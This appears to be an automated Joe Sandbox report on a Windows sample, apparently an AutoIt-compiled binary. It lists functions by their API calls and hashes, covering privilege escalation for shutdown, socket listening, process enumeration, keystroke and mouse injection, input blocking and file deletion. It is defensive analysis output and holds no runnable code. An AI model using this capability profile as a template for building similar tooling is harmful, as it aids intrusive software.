                                                                      • Opcode ID: ac0692ea9c6c9f34ef0616cae4c8ee075f1f754e4f32c581b25ca5969bbf1e7c
                                                                      • Instruction ID: 07336cedf468108a8d49b9222a29bc719c4a4e6c5a821ae80ebaff27cfd72392
                                                                      • Opcode Fuzzy Hash: ac0692ea9c6c9f34ef0616cae4c8ee075f1f754e4f32c581b25ca5969bbf1e7c
                                                                      • Instruction Fuzzy Hash: AA418935604611AFE320DF55D888F2ABBA5FF44329F148099F4198BAA2C735ED42CB91
                                                                      APIs
                                                                        • Part of subcall function 00A216C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A2170D
                                                                        • Part of subcall function 00A216C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A2173A
                                                                        • Part of subcall function 00A216C3: GetLastError.KERNEL32 ref: 00A2174A
                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00A2E932
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                      • String ID: $ $@$SeShutdownPrivilege
                                                                      • API String ID: 2234035333-3163812486
                                                                      • Opcode ID: 9d2664f8931109b18d803261d7bd68069d11dec6121d4c785357c3cfa4c08c4b
                                                                      • Instruction ID: a097e4ba8196377d7b2abc43ca4cce4ed92629b4b8ef590321bcb9c40e60ae1f
                                                                      • Opcode Fuzzy Hash: 9d2664f8931109b18d803261d7bd68069d11dec6121d4c785357c3cfa4c08c4b
                                                                      • Instruction Fuzzy Hash: 7E01D672610331AFEB54A7BCBC8ABBFB26CA714751F150833F812E21D1E5A05CC48294
                                                                      APIs
                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00A41276
                                                                      • WSAGetLastError.WSOCK32 ref: 00A41283
                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00A412BA
                                                                      • WSAGetLastError.WSOCK32 ref: 00A412C5
                                                                      • closesocket.WSOCK32(00000000), ref: 00A412F4
                                                                      • listen.WSOCK32(00000000,00000005), ref: 00A41303
                                                                      • WSAGetLastError.WSOCK32 ref: 00A4130D
                                                                      • closesocket.WSOCK32(00000000), ref: 00A4133C
                                                                      Similarity
                                                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                                                      • String ID:
                                                                      • API String ID: 540024437-0
                                                                      • Opcode ID: 4bd7755cf7e523ec657782c0e57c5042537adf990a82adb3510937dbdd758e63
                                                                      • Instruction ID: 167829208d6dd41ae78f306b6c916a70d4a79f8ac1e8b2856e9ee8ef9dda04ec
                                                                      • Opcode Fuzzy Hash: 4bd7755cf7e523ec657782c0e57c5042537adf990a82adb3510937dbdd758e63
                                                                      • Instruction Fuzzy Hash: 0C417275A002409FD710DF64C489B69BBE5BF86328F18819CE8569F396C771ED82CBE1
                                                                      APIs
                                                                      • _free.LIBCMT ref: 009FB9D4
                                                                      • _free.LIBCMT ref: 009FB9F8
                                                                      • _free.LIBCMT ref: 009FBB7F
                                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00A63700), ref: 009FBB91
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00A9121C,000000FF,00000000,0000003F,00000000,?,?), ref: 009FBC09
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00A91270,000000FF,?,0000003F,00000000,?), ref: 009FBC36
                                                                      • _free.LIBCMT ref: 009FBD4B
                                                                      Similarity
                                                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                      • String ID:
                                                                      • API String ID: 314583886-0
                                                                      • Opcode ID: 60e1896c584cdcb4f5230a9611cc015cd16a863869cb497e4dde9c6a0e29ac7f
                                                                      • Instruction ID: d59f4073d46c9b6f53ab75979351468c1436e3ff9c4cbe3aab4f73ec656b6df2
                                                                      • Opcode Fuzzy Hash: 60e1896c584cdcb4f5230a9611cc015cd16a863869cb497e4dde9c6a0e29ac7f
                                                                      • Instruction Fuzzy Hash: 93C10671A0420DAFCB20EF69DC41BBA7BEDEF85350F2441AAE694D7251EB709E428750
                                                                      APIs
                                                                        • Part of subcall function 009C3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009C3A97,?,?,009C2E7F,?,?,?,00000000), ref: 009C3AC2
                                                                        • Part of subcall function 00A2E199: GetFileAttributesW.KERNEL32(?,00A2CF95), ref: 00A2E19A
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00A2D420
                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00A2D470
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A2D481
                                                                      • FindClose.KERNEL32(00000000), ref: 00A2D498
                                                                      • FindClose.KERNEL32(00000000), ref: 00A2D4A1
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 2649000838-1173974218
                                                                      • Opcode ID: c7469ce57568b29b69261da8dd19caf90a37b29d7e10dec24b291ca950d3315a
                                                                      • Instruction ID: 1a2635f24d7a2f0f05c52697eb0641137cf940c103b45b0522d0b1853d3e03a7
                                                                      • Opcode Fuzzy Hash: c7469ce57568b29b69261da8dd19caf90a37b29d7e10dec24b291ca950d3315a
                                                                      • Instruction Fuzzy Hash: BE316F714083559FC204FF64D855EAFB7A8BED5314F444A2DF4D153192EB30AA09C763
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: __floor_pentium4
                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                      • API String ID: 4168288129-2761157908
                                                                      • Opcode ID: 44d8c7ebd99126d65a9e1878fbd77813cf04edf552509ab32058ca31404a2d9c
                                                                      • Instruction ID: 9ee8ecbdee97ee5ad6dd719eda6a97f2c26b511b490b6b70183d5369c8b62cc8
                                                                      • Opcode Fuzzy Hash: 44d8c7ebd99126d65a9e1878fbd77813cf04edf552509ab32058ca31404a2d9c
                                                                      • Instruction Fuzzy Hash: 55C24971E0862C8FDB25CE289D507EAB7B9EF84305F1445EAD54EE7250E778AE818F40
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00A364DC
                                                                      • CoInitialize.OLE32(00000000), ref: 00A36639
                                                                      • CoCreateInstance.OLE32(00A5FCF8,00000000,00000001,00A5FB68,?), ref: 00A36650
                                                                      • CoUninitialize.OLE32 ref: 00A368D4
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                      • String ID: .lnk
                                                                      • API String ID: 886957087-24824748
                                                                      • Opcode ID: fa326b2dbc32d3edd4e3502a8c90b3186d90496641d647174581d892bca2298d
                                                                      • Instruction ID: 5a832b6a587d3c4e72e340468025c3284a23c934c262b518846063b5baa9efb3
                                                                      • Opcode Fuzzy Hash: fa326b2dbc32d3edd4e3502a8c90b3186d90496641d647174581d892bca2298d
                                                                      • Instruction Fuzzy Hash: 43D11771908301AFD314EF24C881E6BB7E9BFD9704F10896DF5958B291EB71E905CB92
                                                                      APIs
                                                                      • GetForegroundWindow.USER32(?,?,00000000), ref: 00A422E8
                                                                        • Part of subcall function 00A3E4EC: GetWindowRect.USER32(?,?), ref: 00A3E504
                                                                      • GetDesktopWindow.USER32 ref: 00A42312
                                                                      • GetWindowRect.USER32(00000000), ref: 00A42319
                                                                      • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00A42355
                                                                      • GetCursorPos.USER32(?), ref: 00A42381
                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00A423DF
                                                                      Similarity
                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                      • String ID:
                                                                      • API String ID: 2387181109-0
                                                                      • Opcode ID: aca93e918b39f9e1bd3b7d8215d459e6fb7bd2057edb58c0b0b4a0f6cfa040a7
                                                                      • Instruction ID: 8d2efbc7b8d8a1734a44461e6d80303c65457cdd55c5a6652ecef1f400b5bc7d
                                                                      • Opcode Fuzzy Hash: aca93e918b39f9e1bd3b7d8215d459e6fb7bd2057edb58c0b0b4a0f6cfa040a7
                                                                      • Instruction Fuzzy Hash: D831DE72504315AFC720DF58D849B5BBBA9FFC8724F400919F9859B181DB34EA49CB92
                                                                      APIs
                                                                        • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
                                                                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00A39B78
                                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00A39C8B
                                                                        • Part of subcall function 00A33874: GetInputState.USER32 ref: 00A338CB
                                                                        • Part of subcall function 00A33874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A33966
                                                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00A39BA8
                                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00A39C75
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                      • String ID: *.*
                                                                      • API String ID: 1972594611-438819550
                                                                      • Opcode ID: 300e4586161b3ddce8b25d875e021ed291e73a10eea12e9ef9f2e11b1d9f9739
                                                                      • Instruction ID: 92b9558bfae39e9b516b9c3da1391b4c6b087ea906d8a260565010628508e208
                                                                      • Opcode Fuzzy Hash: 300e4586161b3ddce8b25d875e021ed291e73a10eea12e9ef9f2e11b1d9f9739
                                                                      • Instruction Fuzzy Hash: A441717190420AAFDF54DFA4C989BEEBBB4FF45311F144159F805A2191EB709E84CF61
                                                                      APIs
                                                                        • Part of subcall function 009D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 009D9BB2
                                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 009D9A4E
                                                                      • GetSysColor.USER32(0000000F), ref: 009D9B23
                                                                      • SetBkColor.GDI32(?,00000000), ref: 009D9B36
                                                                      Similarity
                                                                      • API ID: Color$LongProcWindow
                                                                      • String ID:
                                                                      • API String ID: 3131106179-0
                                                                      • Opcode ID: 319ced3f1d92149f6f718a23a84434063dd792241ef881eab1416d8232055b56
                                                                      • Instruction ID: 5c624851f5d29ae2aeac676617d0a220ed45519b43ff96f02ad62f9e1c991ddb
                                                                      • Opcode Fuzzy Hash: 319ced3f1d92149f6f718a23a84434063dd792241ef881eab1416d8232055b56
                                                                      • Instruction Fuzzy Hash: 24A13971288500BEE724FB3C8D98EBF26ADEB82350F15860BF412DA7D1DA299D41D271
                                                                      APIs
                                                                        • Part of subcall function 00A4304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A4307A
                                                                        • Part of subcall function 00A4304E: _wcslen.LIBCMT ref: 00A4309B
                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00A4185D
                                                                      • WSAGetLastError.WSOCK32 ref: 00A41884
                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00A418DB
                                                                      • WSAGetLastError.WSOCK32 ref: 00A418E6
                                                                      • closesocket.WSOCK32(00000000), ref: 00A41915
                                                                      Similarity
                                                                      • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                      • String ID:
                                                                      • API String ID: 1601658205-0
                                                                      • Opcode ID: 7b25e6288f6edbead8dc263627a364996c76886c229259e213d56c48d1b54d0d
                                                                      • Instruction ID: 0c78bef5a3078d6c71a33f0bc32ed4873522c888702bfed3e64fa736d917aaea
                                                                      • Opcode Fuzzy Hash: 7b25e6288f6edbead8dc263627a364996c76886c229259e213d56c48d1b54d0d
                                                                      • Instruction Fuzzy Hash: FC519375A00210AFDB10EF64C886F6A7BE5ABC4718F18845CF9169F3D3D771AD428BA1
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                      • String ID:
                                                                      • API String ID: 292994002-0
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                      • API String ID: 0-1546025612
                                                                      APIs
                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00A4A6AC
                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00A4A6BA
                                                                        • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00A4A79C
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00A4A7AB
                                                                        • Part of subcall function 009DCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00A03303,?), ref: 009DCE8A
                                                                      Similarity
                                                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                      • String ID:
                                                                      • API String ID: 1991900642-0
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00A2AAAC
                                                                      • SetKeyboardState.USER32(00000080), ref: 00A2AAC8
                                                                      • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00A2AB36
                                                                      • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00A2AB88
                                                                      Similarity
                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                      • String ID:
                                                                      • API String ID: 432972143-0
                                                                      APIs
                                                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 00A3CE89
                                                                      • GetLastError.KERNEL32(?,00000000), ref: 00A3CEEA
                                                                      • SetEvent.KERNEL32(?,?,00000000), ref: 00A3CEFE
                                                                      Similarity
                                                                      • API ID: ErrorEventFileInternetLastRead
                                                                      • String ID:
                                                                      • API String ID: 234945975-0
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00A282AA
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: lstrlen
                                                                      • String ID: ($|
                                                                      • API String ID: 1659193697-1631851259
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00A35CC1
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00A35D17
                                                                      • FindClose.KERNEL32(?), ref: 00A35D5F
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstNext
                                                                      • String ID:
                                                                      • API String ID: 3541575487-0
                                                                      APIs
                                                                      • IsDebuggerPresent.KERNEL32 ref: 009F271A
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009F2724
                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 009F2731
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                      • String ID:
                                                                      • API String ID: 3906539128-0
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00A351DA
                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00A35238
                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00A352A1
                                                                      Similarity
                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                      • String ID:
                                                                      • API String ID: 1682464887-0
                                                                      APIs
                                                                        • Part of subcall function 009DFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 009E0668
                                                                        • Part of subcall function 009DFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 009E0685
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A2170D
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A2173A
                                                                      • GetLastError.KERNEL32 ref: 00A2174A
                                                                      Similarity
                                                                      • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                      • String ID:
                                                                      • API String ID: 577356006-0
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00A2D608
                                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00A2D645
                                                                      • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00A2D650
                                                                      Similarity
                                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                                      • String ID:
                                                                      • API String ID: 33631002-0
                                                                      APIs
                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00A2168C
                                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00A216A1
                                                                      • FreeSid.ADVAPI32(?), ref: 00A216B1
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
APIs
• GetCurrentProcess.KERNEL32(009F28E9,?,009E4CBE,009F28E9,00A888B8,0000000C,009E4E15,009F28E9,00000002,00000000,?,009F28E9), ref: 009E4D09
• TerminateProcess.KERNEL32(00000000,?,009E4CBE,009F28E9,00A888B8,0000000C,009E4E15,009F28E9,00000002,00000000,?,009F28E9), ref: 009E4D10
• ExitProcess.KERNEL32 ref: 009E4D22
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
Similarity
• API ID:
• String ID: /
• API String ID: 0-2043925204
APIs
• GetUserNameW.ADVAPI32(?,?), ref: 00A1D28C
Similarity
• API ID: NameUser
• String ID: X64
• API String ID: 2645101109-893830106
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00A36918
• FindClose.KERNEL32(00000000), ref: 00A36961
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00A44891,?,?,00000035,?), ref: 00A337E4
• FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00A44891,?,?,00000035,?), ref: 00A337F4
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
APIs
• SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00A2B25D
• keybd_event.USER32(?,76C1C0D0,?,00000000), ref: 00A2B270
Similarity
• API ID: InputSendkeybd_event
• String ID:
• API String ID: 3536248340-0
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A211FC), ref: 00A210D4
• CloseHandle.KERNEL32(?,?,00A211FC), ref: 00A210E9
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• API String ID: 81990902-0
Strings
• Variable is not of type 'Object'., xrefs: 00A10C40
Similarity
• API ID:
• String ID: Variable is not of type 'Object'.
• API String ID: 0-1840281001
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,009F6766,?,?,00000008,?,?,009FFEFE,00000000), ref: 009F6998
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
APIs
• BlockInput.USER32(00000001), ref: 00A3EABD
                                                                      Similarity
                                                                      • API ID: BlockInput
                                                                      • String ID:
                                                                      • API String ID: 3456056419-0
                                                                      • Opcode ID: 51e618186bc6e575716fd40150f4c55836c0dcfca9d7f6ea40ce1a23050364f0
                                                                      • Instruction ID: f920f6e23a4d2688c141ce0138d63babe6c3b20555c8a499eaf64c3ca1ec2f77
                                                                      • Opcode Fuzzy Hash: 51e618186bc6e575716fd40150f4c55836c0dcfca9d7f6ea40ce1a23050364f0
                                                                      • Instruction Fuzzy Hash: 19E01A316002059FC710EF59D805E9ABBE9AF987A1F00841AFC49C7391DA70A9418B91
                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,009E03EE), ref: 009E09DA
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: 93c6f04194f3bbd6773e1b0c8df38218a485f85c41408c66ebbefb8d5704121b
                                                                      • Instruction ID: b0644e232b4a1001ef44734275d23ff8f7d3d80cbaed6a25a8c224af8e7f55a4
                                                                      • Opcode Fuzzy Hash: 93c6f04194f3bbd6773e1b0c8df38218a485f85c41408c66ebbefb8d5704121b
                                                                      • Instruction Fuzzy Hash:
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0
                                                                      • API String ID: 0-4108050209
                                                                      • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                      • Instruction ID: 94db70461fff6b521c801271b043417a4245253dcebea68de565175d7478c66f
                                                                      • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                      • Instruction Fuzzy Hash: 9E51437160C6C56BDB3B85EB889A7BFE78D9F62340F180919D886C7283CA19DE01D353
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 113640d2205e8c45d866bb1d4ba0f2b5f0bc3dcdc4ec1e9955eff53d34c49d3b
                                                                      • Instruction ID: d7bce63c0f02abee9b5b80305560cf07343eb9e220010d0a8fe353110825f77b
                                                                      • Opcode Fuzzy Hash: 113640d2205e8c45d866bb1d4ba0f2b5f0bc3dcdc4ec1e9955eff53d34c49d3b
                                                                      • Instruction Fuzzy Hash: D5325522D29F054DD7239674CC22335A69DAFB73D5F14C737F81AB59A9EB69C4834200
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 79b8c83f0a61b5e72db4c1bdfc27b0e7707056c3a590412f17ce46a5a56cf6e2
                                                                      • Instruction ID: 26a406b16abf35759cfb94c9594d7fc6846aeebf99086a998c45c8a167c6fa58
                                                                      • Opcode Fuzzy Hash: 79b8c83f0a61b5e72db4c1bdfc27b0e7707056c3a590412f17ce46a5a56cf6e2
                                                                      • Instruction Fuzzy Hash: 62321272A841168BDF28CB28C5946FD7BB2EF45360F28896BD59ACB391D234DDC1DB40
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5346f1b2a3f908f5ab20aa56c19be4b1243affe73857c380392eb683e2c49407
                                                                      • Instruction ID: 500c95a3e027b6feb9e50ec2a06566ecd38d48379c45f873b1238bd0f7972b2a
                                                                      • Opcode Fuzzy Hash: 5346f1b2a3f908f5ab20aa56c19be4b1243affe73857c380392eb683e2c49407
                                                                      • Instruction Fuzzy Hash: 4222AF70E0060A9FDF14CFA5D881BAEB7B6FF48300F144529E816AB291EB36AD51CF51
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: da2da6c169a58cdf04fe7fd95a06cc5342242875b317f1bd9df6ebe5d1e0a3fd
                                                                      • Instruction ID: 6a72034f14dac3a325332756c21ecdc1cf07b6c2a7e8a0fdd985f81a3cbc0e6c
                                                                      • Opcode Fuzzy Hash: da2da6c169a58cdf04fe7fd95a06cc5342242875b317f1bd9df6ebe5d1e0a3fd
                                                                      • Instruction Fuzzy Hash: 5902B4B1E00209EBDB04DF54D881BAEB7B1FF44300F508569E81A9B2D1EB35AE61DB91
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                      • Instruction ID: c4e239ca10a0fbe3dd6c96a20f7b6235c9d565959ef4cae99c9c92f3c21b01d3
                                                                      • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                      • Instruction Fuzzy Hash: 909157726080E34ADB2F463B857447EFFE55A923A131A0B9DE4F2CA1C5EE34DD94D620
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                      • Instruction ID: 6b6090f08d588e0aaf634fc1cfe45a61a2a9146dfd483d3e9e976529d022031d
                                                                      • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                      • Instruction Fuzzy Hash: 8A9121722090E34ADB6B467B957403DFFE55A923A131E07AED4F2CA1C5FE348D54D620
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7840a9bc01fae0124cbad6268698df2b7d559836f21870626695f1d30f5da421
                                                                      • Instruction ID: 45f66d0bbf8fdd857f5ecde1d0ae76997beb973b2cd24c7a0258d507ff3cb951
                                                                      • Opcode Fuzzy Hash: 7840a9bc01fae0124cbad6268698df2b7d559836f21870626695f1d30f5da421
                                                                      • Instruction Fuzzy Hash: A3615B716087C996DA3799EB8C95BBFF39CDF81700F280D2DE882DB281D6159E428357
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 15b60899ca933000c86e26c1023145e9d744a4506c5a5486e1a812c52ceb9111
                                                                      • Instruction ID: f419640b93972dbe1ad49459f1c6a92276a578c30c0a32162f54eb1ee38edef0
                                                                      • Opcode Fuzzy Hash: 15b60899ca933000c86e26c1023145e9d744a4506c5a5486e1a812c52ceb9111
                                                                      • Instruction Fuzzy Hash: A0616A712087C9A6DA3B49EB4C55BBFE38DAF42700F100D5DE946CB2D1DA159DC2C217
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                      • Instruction ID: f21813994fb3bf864efb30dceb780425fb5eefb4d6b1c749e3faa08bcd37d48a
                                                                      • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                      • Instruction Fuzzy Hash: 8D8163766090E34ADB6F423B857447EFFE55A923A131A079ED4F2CA1C2EE34CD54E620
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6bb6063584bfe506f909a47f03a9f83457f4daa18b7199b09553cd7f925bf4ff
                                                                      • Instruction ID: f2678cae62188eeb17b7feb1d1b42a9ccbdd2aaf210bf95fa4d5ae5572c3d653
                                                                      • Opcode Fuzzy Hash: 6bb6063584bfe506f909a47f03a9f83457f4daa18b7199b09553cd7f925bf4ff
                                                                      • Instruction Fuzzy Hash: E62181327216118BDB28CF79C8227BE73E5A754310F15862EA4A7C76D0DE35A9048B80
                                                                      APIs
                                                                      • DeleteObject.GDI32(00000000), ref: 00A42B30
                                                                      • DeleteObject.GDI32(00000000), ref: 00A42B43
                                                                      • DestroyWindow.USER32 ref: 00A42B52
                                                                      • GetDesktopWindow.USER32 ref: 00A42B6D
                                                                      • GetWindowRect.USER32(00000000), ref: 00A42B74
                                                                      • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00A42CA3
                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00A42CB1
                                                                      • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A42CF8
                                                                      • GetClientRect.USER32(00000000,?), ref: 00A42D04
                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00A42D40
                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A42D62
                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A42D75
                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A42D80
                                                                      • GlobalLock.KERNEL32(00000000), ref: 00A42D89
                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A42D98
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00A42DA1
                                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A42DA8
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00A42DB3
                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A42DC5
                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00A5FC38,00000000), ref: 00A42DDB
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00A42DEB
                                                                      • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00A42E11
                                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00A42E30
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A42E52
